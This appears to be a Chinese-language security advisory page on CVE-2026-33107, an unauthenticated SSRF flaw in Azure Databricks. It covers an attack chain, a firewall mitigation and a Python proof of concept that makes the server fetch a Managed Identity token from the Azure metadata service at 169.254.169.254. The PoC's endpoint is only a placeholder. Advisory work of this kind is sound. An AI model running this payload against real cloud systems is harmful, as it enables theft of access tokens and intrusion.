CVE-2026-33107 CVSS 10.0 严重

CVE-2026-33107 Azure Databricks SSRF漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33107

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Azure Databricks

漏洞概述

CVE-2026-33107是Azure Databricks平台中存在的严重服务端请求伪造（SSRF）漏洞，CVSS评分为满分10.0。该漏洞允许未经身份验证的攻击者在无需用户交互的情况下，通过网络发起攻击并提升权限。成功利用该漏洞可能导致敏感数据泄露、数据篡改及服务中断，对系统的机密性、完整性和可用性构成极高威胁。

技术细节

该漏洞的根本原因是Azure Databricks在处理特定网络请求时，未对用户提交的目标URL地址进行严格的白名单验证或有效的网络隔离，从而引入了服务端请求伪造（SSRF）风险。攻击者无需任何认证即可向受影响的API接口发送特制数据包，诱导服务器向内网敏感资源或云厂商元数据服务发起HTTP请求。在典型的利用场景中，攻击者会强制服务器请求Azure Instance Metadata Service (IMDS, 169.254.169.254)，试图获取Managed Identity的访问令牌或其他敏感配置信息。鉴于CVSS向量显示攻击复杂度低且无需权限，攻击者一旦获取高权限令牌，便能突破安全边界，在云环境中进行横向移动，完全破坏数据的机密性、完整性与可用性。

攻击链分析

STEP 1

侦察

攻击者识别出Azure Databricks环境中的易受攻击端点，该端点接受URL参数并执行服务端请求。

STEP 2

武器化与交付

攻击者构造包含内部元数据服务地址（如169.254.169.254）的恶意SSRF请求，并将其发送至目标端点。

STEP 3

利用与提权

Databricks服务器解析请求并访问内部元数据服务，返回了敏感的访问令牌或凭证。攻击者利用这些凭证提升权限。

STEP 4

后渗透行动

利用获取的高权限令牌，攻击者访问数据库、控制计算资源或在云环境中进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "https://<databricks-instance>/api/vulnerable-endpoint"

# Malicious payload targeting Azure Instance Metadata Service
# Attempting to retrieve access tokens from the internal metadata service
ssrf_payload = {
    "url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.core.windows.net/",
    "method": "GET"
}

try:
    print("[+] Sending SSRF payload to target...")
    response = requests.post(target_url, json=ssrf_payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request successful! Check response for leaked credentials.")
        print("Response Body:", response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

请参考官方Microsoft安全公告确认受影响的具体Azure Databricks版本

防御指南

临时缓解措施

如果无法立即修补，建议在网络防火墙或安全组中配置规则，明确禁止Databricks计算资源访问169.254.169.254（Azure Instance Metadata Service）。同时，密切监控异常的网络流量和API访问日志，以检测可能的SSRF利用尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表